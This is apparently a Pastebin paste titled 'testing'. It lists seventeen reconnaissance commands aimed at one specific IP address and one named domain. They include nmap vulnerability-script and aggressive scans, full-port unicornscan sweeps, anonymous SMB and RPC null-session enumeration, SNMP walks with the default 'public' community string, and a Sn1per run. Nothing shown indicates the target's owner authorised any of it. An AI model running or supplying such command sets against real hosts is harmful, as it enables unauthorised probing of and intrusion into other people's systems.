Advertisement
Guest User

Pr0x1 "testing"

a guest
May 25th, 2019
87
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.67 KB | None | 0 0
  1. nmap –script smb-check-vulns.nse -p445 -sX 178.62.124.35
  2. nmap -sU -P0 -T5 Aggressive -p123 178.62.124.35
  3. nmap -sA -PN -sN 178.62.124.35
  4. nmap -sS -sV -T5 -F -A -O 178.62.124.35
  5. nmap -sU -v 178.62.124.35
  6. nmap -sU -P0 178.62.124.35
  7. nmap -sC 178.62.124.35
  8. us -H -msf -Iv 178.62.124.35 -p 1-65535
  9. us -H -mU -Iv 178.62.124.35 -p 1-65535
  10. nmblookup -A 178.62.124.35
  11. smbclient //MOUNT/share -I 178.62.124.35 -N
  12. rpcclient -U "" 178.62.124.35
  13. enum4linux 178.62.124.35
  14. snmpget -v 1 -c public 178.62.124.35
  15. snmpwalk -v 1 -c public 178.62.124.35
  16. snmpbulkwalk -v2c -c public -Cn0 -Cr10 178.62.124.35
  17. sniper -t lamenteesmaravillosa.com -m -b -fp
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement